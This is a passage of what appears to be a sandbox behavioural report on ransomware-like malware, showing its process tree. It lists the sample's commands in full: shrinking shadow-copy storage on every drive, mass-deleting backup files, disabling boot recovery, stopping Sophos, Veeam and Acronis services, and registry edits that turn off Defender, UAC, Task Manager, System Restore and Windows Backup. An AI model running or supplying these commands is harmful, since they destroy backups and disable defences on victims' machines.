    3⤵
    PID:2360
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=401MB
      4⤵
      PID:2472
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:4632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=401MB
    3⤵
    PID:1652
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=401MB
      4⤵
      PID:2556
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:2084
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=401MB
    3⤵
    PID:1660
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=401MB
      4⤵
      PID:2656
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:1488
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=401MB
    3⤵
    PID:2224
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=401MB
      4⤵
      PID:1496
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:5144
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=401MB
    3⤵
    PID:4264
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=401MB
      4⤵
      PID:3296
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:5168
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=401MB
    3⤵
    PID:1936
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=401MB
      4⤵
      PID:2608
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:3184
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=401MB
    3⤵
    PID:4240
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=401MB
      4⤵
      PID:2640
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:3076
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=401MB
    3⤵
    PID:2724
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=401MB
      4⤵
      PID:2180
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:5104
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=401MB
    3⤵
    PID:3148
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=401MB
      4⤵
      PID:4180
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:4804
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
    3⤵
    PID:2060
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
      4⤵
      PID:2800
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
        5⤵
        Interacts with shadow copies
        
        PID:3556
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=401MB
    3⤵
    PID:3304
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=401MB
      4⤵
      PID:2628
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:4684
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=401MB
    3⤵
    PID:4172
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=401MB
      4⤵
      PID:2648
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:2928
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop " Enterprise Client Service"
    3⤵
    PID:5524
  - - C:\Windows\system32\net.exe
      net stop " Enterprise Client Service"
      4⤵
      PID:5652
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop " Enterprise Client Service"
        5⤵
        
        PID:5668
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q Z:\*.bac Z:\*.bak Z:\Backup*.* Z:\backup*.*
    3⤵
    PID:5712
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q L:\*.bac L:\*.bak L:\Backup*.* L:\backup*.*
    3⤵
    PID:5720
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q A:\*.bac A:\*.bak A:\Backup*.* A:\backup*.*
    3⤵
    PID:5728
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q B:\*.bac B:\*.bak B:\Backup*.* B:\backup*.*
    3⤵
    PID:5740
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q H:\*.bac H:\*.bak H:\Backup*.* H:\backup*.*
    3⤵
    PID:5756
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q S:\*.bac S:\*.bak S:\Backup*.* S:\backup*.*
    3⤵
    PID:5764
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q I:\*.bac I:\*.bak I:\Backup*.* I:\backup*.*
    3⤵
    PID:5776
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q X:\*.bac X:\*.bak X:\Backup*.* X:\backup*.*
    3⤵
    PID:5788
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q F:\*.bac F:\*.bak F:\Backup*.* F:\backup*.*
    3⤵
    PID:5800
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q M:\*.bac M:\*.bak M:\Backup*.* M:\backup*.*
    3⤵
    PID:5808
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q W:\*.bac W:\*.bak W:\Backup*.* W:\backup*.*
    3⤵
    PID:5820
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q E:\*.bac E:\*.bak E:\Backup*.* E:\backup*.*
    3⤵
    PID:5832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q C:\*.bac C:\*.bak C:\Backup*.* C:\backup*.*
    3⤵
    PID:5840
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q P:\*.bac P:\*.bak P:\Backup*.* P:\backup*.*
    3⤵
    PID:5852
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q Y:\*.bac Y:\*.bak Y:\Backup*.* Y:\backup*.*
    3⤵
    PID:5864
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q O:\*.bac O:\*.bak O:\Backup*.* O:\backup*.*
    3⤵
    PID:5876
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q G:\*.bac G:\*.bak G:\Backup*.* G:\backup*.*
    3⤵
    PID:5884
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q N:\*.bac N:\*.bak N:\Backup*.* N:\backup*.*
    3⤵
    PID:5892
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q K:\*.bac K:\*.bak K:\Backup*.* K:\backup*.*
    3⤵
    PID:5912
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q U:\*.bac U:\*.bak U:\Backup*.* U:\backup*.*
    3⤵
    PID:5924
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Sophos Agent"
    3⤵
    PID:5948
  - - C:\Windows\system32\net.exe
      net stop "Sophos Agent"
      4⤵
      PID:5996
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Sophos Agent"
        5⤵
        
        PID:6100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q R:\*.bac R:\*.bak R:\Backup*.* R:\backup*.*
    3⤵
    PID:6036
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q T:\*.bac T:\*.bak T:\Backup*.* T:\backup*.*
    3⤵
    PID:6068
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q D:\*.bac D:\*.bak D:\Backup*.* D:\backup*.*
    3⤵
    PID:6076
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q J:\*.bac J:\*.bak J:\Backup*.* J:\backup*.*
    3⤵
    PID:6136
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q V:\*.bac V:\*.bak V:\Backup*.* V:\backup*.*
    3⤵
    PID:4756
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c bcdedit /set {default} recoveryenabled No
    3⤵
    PID:5068
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c bcdedit /set {default} recoveryenabled No
      4⤵
      PID:1144
    - - C:\Windows\system32\bcdedit.exe
        
        bcdedit /set {default} recoveryenabled No
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:4700
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q Q:\*.bac Q:\*.bak Q:\Backup*.* Q:\backup*.*
    3⤵
    PID:5436
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Sophos AutoUpdate Service"
    3⤵
    PID:228
  - - C:\Windows\system32\net.exe
      net stop "Sophos AutoUpdate Service"
      4⤵
      PID:1864
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Sophos AutoUpdate Service"
        5⤵
        
        PID:4188
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
    3⤵
    PID:408
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
      4⤵
      PID:5220
    - - C:\Windows\system32\bcdedit.exe
        
        bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:5424
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Sophos Clean Service"
    3⤵
    PID:5264
  - - C:\Windows\system32\net.exe
      net stop "Sophos Clean Service"
      4⤵
      PID:3460
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Sophos Clean Service"
        5⤵
        
        PID:5228
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    PID:3856
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
      4⤵
      UAC bypass
      PID:2976
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Sophos Device Control Service"
    3⤵
    PID:2460
  - - C:\Windows\system32\net.exe
      net stop "Sophos Device Control Service"
      4⤵
      PID:5540
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Sophos Device Control Service"
        5⤵
        
        PID:2324
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
    3⤵
    PID:5288
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
      4⤵
      PID:5200
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Sophos File Scanner Service"
    3⤵
    PID:5516
  - - C:\Windows\system32\net.exe
      net stop "Sophos File Scanner Service"
      4⤵
      PID:4456
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Sophos File Scanner Service"
        5⤵
        
        PID:2692
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    PID:5440
  - - C:\Windows\system32\reg.exe
      reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
      4⤵
      PID:848
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:1872
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
      4⤵
      PID:4320
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Sophos Health Service"
    3⤵
    PID:3164
  - - C:\Windows\system32\net.exe
      net stop "Sophos Health Service"
      4⤵
      PID:1932
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Sophos Health Service"
        5⤵
        
        PID:3756
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f
    3⤵
    PID:4668
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f
      4⤵
      PID:5356
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Sophos MCS Agent"
    3⤵
    PID:2084
  - - C:\Windows\system32\net.exe
      net stop "Sophos MCS Agent"
      4⤵
      PID:1368
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Sophos MCS Agent"
        5⤵
        
        PID:2764
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
    3⤵
    PID:3820
  - - C:\Windows\system32\reg.exe
      reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
      4⤵
      PID:2856
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
    3⤵
    PID:5156
  - - C:\Windows\system32\reg.exe
      reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
      4⤵
      PID:2308
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Sophos MCS Client"
    3⤵
    PID:5232
  - - C:\Windows\system32\net.exe
      net stop "Sophos MCS Client"
      4⤵
      PID:4484
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Sophos MCS Client"
        5⤵
        
        PID:3008
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
    3⤵
    PID:4652
  - - C:\Windows\system32\reg.exe
      reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
      4⤵
      PID:2816
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Sophos Message Router"
    3⤵
    PID:5692
  - - C:\Windows\system32\net.exe
      net stop "Sophos Message Router"
      4⤵
      PID:3028
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Sophos Message Router"
        5⤵
        
        PID:216
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
    3⤵
    PID:5032
  - - C:\Windows\system32\reg.exe
      reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
      4⤵
      PID:4692
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
    3⤵
    PID:2760
  - - C:\Windows\system32\reg.exe
      reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
      4⤵
      PID:1152
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Sophos Safestore Service"
    3⤵
    PID:4792
  - - C:\Windows\system32\net.exe
      net stop "Sophos Safestore Service"
      4⤵
      PID:2100
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Sophos Safestore Service"
        5⤵
        
        PID:3848
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
    3⤵
    PID:4348
  - - C:\Windows\system32\reg.exe
      reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
      4⤵
      PID:3608
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Sophos System Protection Service"
    3⤵
    PID:3052
  - - C:\Windows\system32\net.exe
      net stop "Sophos System Protection Service"
      4⤵
      PID:2900
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Sophos System Protection Service"
        5⤵
        
        PID:3976
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
    3⤵
    PID:1496
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
      4⤵
      PID:5092
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
    3⤵
    PID:3936
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
      4⤵
      PID:3988
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Sophos Web Control Service"
    3⤵
    PID:5328
  - - C:\Windows\system32\net.exe
      net stop "Sophos Web Control Service"
      4⤵
      PID:3248
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Sophos Web Control Service"
        5⤵
        
        PID:1384
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
    3⤵
    PID:5172
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
      4⤵
      PID:2296
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLsafe Backup Service"
    3⤵
    PID:4452
  - - C:\Windows\system32\net.exe
      net stop "SQLsafe Backup Service"
      4⤵
      PID:3544
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLsafe Backup Service"
        5⤵
        
        PID:4140
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
    3⤵
    PID:1256
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
      4⤵
      PID:5108
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLsafe Filter Service"
    3⤵
    PID:1848
  - - C:\Windows\system32\net.exe
      net stop "SQLsafe Filter Service"
      4⤵
      PID:3760
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLsafe Filter Service"
        5⤵
        
        PID:1936
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
    3⤵
    PID:2656
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
      4⤵
      PID:1956
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
    3⤵
    PID:2184
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
      4⤵
      PID:2316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Symantec System Recovery"
    3⤵
    PID:4236
  - - C:\Windows\system32\net.exe
      net stop "Symantec System Recovery"
      4⤵
      PID:2548
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Symantec System Recovery"
        5⤵
        
        PID:5348
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
    3⤵
    PID:4568
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
      4⤵
      PID:2836
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Veeam Backup Catalog Data Service"
    3⤵
    PID:4440
  - - C:\Windows\system32\net.exe
      net stop "Veeam Backup Catalog Data Service"
      4⤵
      PID:5404
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Veeam Backup Catalog Data Service"
        5⤵
        
        PID:5524
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
    3⤵
    PID:3944
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
      4⤵
      PID:5368
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
    3⤵
    PID:5752
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
      4⤵
      PID:4412
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "AcronisAgent"
    3⤵
    PID:2752
  - - C:\Windows\system32\net.exe
      net stop "AcronisAgent"
      4⤵
      PID:2872
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "AcronisAgent"
        5⤵
        
        PID:396
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
    3⤵
    PID:4376
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
      4⤵
      PID:5944
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "AcrSch2Svc"
    3⤵
    PID:428
  - - C:\Windows\system32\net.exe
      net stop "AcrSch2Svc"
      4⤵
      PID:5792
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "AcrSch2Svc"
        5⤵
        
        PID:1364
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
    3⤵
    PID:6024
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
      4⤵
      PID:2244
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
    3⤵
    PID:4576
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
      4⤵
